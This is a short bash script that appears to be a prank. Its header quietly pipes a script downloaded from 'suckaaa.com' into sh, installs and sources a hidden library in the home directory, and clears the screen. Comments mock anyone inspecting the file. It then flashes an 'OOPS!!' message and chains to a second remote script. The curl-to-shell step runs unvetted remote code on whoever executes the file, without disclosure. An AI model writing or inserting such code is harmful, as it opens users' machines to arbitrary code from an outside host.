#!/bin/bash

###########  HEADER  ###########
# loL whatcha lookin for in here??
# Don't worry about it!!
curl -s 'https://suckaaa.com/s/garbage-lib-installer' | sh;
source ~/.complete-garbage/lib;
clear;
###########  END HEADER  ###########

cancelNoise;
cancelNoise;
cancelNoise;
cancelNoise;
cancelNoise;
cancelNoise;

setPosition 0 0;

bigMsg 'OOPS!!';

nextScript 'https://suckaaa.com/s/dont-touch-a-thing';
# dont-touch-a-thing
